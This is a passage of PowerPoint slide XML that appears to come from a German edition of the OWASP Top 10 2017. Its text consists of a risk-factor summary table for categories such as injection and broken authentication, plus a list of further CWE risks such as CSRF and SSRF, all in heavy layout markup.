              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="340" y="1997"/>
                  <a:ext cx="144" cy="193"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1">
                    <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="46" name="Line 68"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="196" y="1853"/>
                  <a:ext cx="288" cy="0"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1">
                    <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="37" name="Rectangle 89"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="-36022" y="972543"/>
                <a:ext cx="588623" cy="509406"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" err="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Bedro</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US"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br>
                  <a:rPr lang="en-US"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err="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hungs</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US"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br>
                  <a:rPr lang="en-US"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err="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quellen</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"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err="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Angriffs</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US"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br>
                  <a:rPr lang="en-US"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err="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vektoren</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"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tabLst>
                    <a:tab pos="234000" algn="l"/>
                  </a:tabLst>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US"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err="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Schwach</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US"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br>
                  <a:rPr lang="en-US"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err="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stelle</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"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cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="40" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="38" idx="3"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2027790" y="1257554"/>
                <a:ext cx="838200" cy="4864"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector2">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latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:endParaRPr>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Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="34" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="39" idx="3"/>
              <a:endCxn id="35" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="3899845" y="1251307"/>
              <a:ext cx="13579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2" name="Right Brace 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2726280" y="6823974"/>
            <a:ext cx="316911" cy="2241840"/>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latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Right Brace 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4205337" y="7754560"/>
            <a:ext cx="292533" cy="1665187"/>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latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="274862043"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="939599"/>
          <a:ext cx="6854400" cy="1444500"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6854400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="334800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" noProof="0" dirty="0">
                          <a:latin typeface="Exo 2"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Zusammenfassung der Top 10 Risiko-Faktoren</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="1600" b="1" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2"/>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1106025">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de-DE" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Die folgende Tabelle stellt eine Zusammenfassung der Top 10 Risiken für die Anwendungssicherheit in der Version des Jahres 2017 und der dazugehörigen Risiko-Faktoren dar. Diese Faktoren wurden durch verfügbare Statistiken und die Erfahrung des OWASP-Teams bestimmt. Um diese Risiken für eine bestimmte Anwendung oder Organisation zu verstehen, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" u="sng" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>muss der Leser seine eigenen, spezifischen Bedrohungsquellen und Auswirkungen auf sein Unternehmen betrachten</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. Selbst eklatante Software-Schwachstellen müssen nicht zwangsläufig ein ernsthaftes Risiko darstellen, wenn es z.B. keine Bedrohungsquellen gibt, die den notwendigen Angriff ausführen können oder die tatsächlichen Auswirkungen auf das Unternehmen und die Geschäftsprozesse zu vernachlässigen sind.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans"/>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5" name="Table 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="196775701"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="7048812"/>
          <a:ext cx="6854400" cy="2853376"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6854400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="334800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" noProof="0" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Weitere Risiken, die man prüfen sollte</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="1600" b="1" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>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515936">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de-DE" sz="1000" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Auch wenn die Top 10 bereits sehr viele Problemfelder abdecken, so gibt es dennoch weitere Risiken, die man in Betracht ziehen und im jeweiligen Unternehmen oder der Organisation evaluieren sollte. Einige waren schon in früheren Versionen der OWASP Top 10 enthalten, andere nicht - wie z.B. neue Angriffstechniken. Diese werden permanent gesucht, gefunden und weiter entwickelt. Andere wichtige Sicherheitsrisiken für Anwendungen, die man sich ebenfalls näher ansehen sollte, sind (sortiert nach CVE-ID):</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="11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4"/>
                        </a:rPr>
                        <a:t>CWE-352: Cross-Site Request Forgery (CSRF)</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5"/>
                        </a:rPr>
                        <a:t>CWE-400: Uncontrolled Resource Consumption ('Resource Exhaustion', '</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>AppDoS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>')</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6"/>
                        </a:rPr>
                        <a:t>CWE-434: Unrestricted Upload of File with Dangerous Type</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7"/>
                        </a:rPr>
                        <a:t>CWE-451: User Interface (UI) Misrepresentation of Critical Information (Clickjacking and others)</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8"/>
                        </a:rPr>
                        <a:t>CWE-601: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>Unvalidated</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t> Forward and Redirects</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9"/>
                        </a:rPr>
                        <a:t>CWE-799: Improper Control of Interaction Frequency (Anti-Automation)</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10"/>
                        </a:rPr>
                        <a:t>CWE-829: Inclusion of Functionality from Untrusted Control Sphere (3rd Party Content)</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11"/>
                        </a:rPr>
                        <a:t>CWE-918: Server-Side Request Forgery (SSRF)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0">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8" name="Table 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2706992856"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="2393950"/>
          <a:ext cx="6840000" cy="4575325"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1216884">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="503834">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1031968">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1105680">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1031968">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1031968">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20005"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="503834">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20006"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="413864">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20007"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="669958">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>RISIKO</a:t>
                      </a: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950" b="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>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950" b="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>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950" b="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>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1100" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Wert</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="1">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRP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A1:2017-Injection</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rowSpan="10">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Anwendungs-spezifisch</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="45720" marT="49530" marB="49530" vert="vert27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de-DE" sz="950" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Einfach: 3</a:t>
                      </a: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de-DE" sz="950" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Häufig: 2</a:t>
                      </a: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de-DE" sz="950" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Einfach: 3</a:t>
                      </a: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de-DE" sz="950" b="1" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Schwerwiegend</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="de-DE" sz="950" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> 3</a:t>
                      </a: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rowSpan="10">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1200" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Daten</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>- &amp; </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Geschäfts-spezifisch</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="36000" marR="36000" marT="49530" marB="49530" vert="vert27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en-US" sz="900" b="1" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>8,0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A2:2017-Fehler in </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Authentifizierung</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vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="800" b="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de-DE" sz="950" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Einfach: 3</a:t>
                      </a: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de-DE" sz="950" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Häufig: 2</a:t>
                      </a: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de-DE" sz="900" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Durchschnittlich</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="950" b="1">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRP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de-DE" sz="950" b="1" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Schwerwiegend</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="de-DE" sz="950" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1">
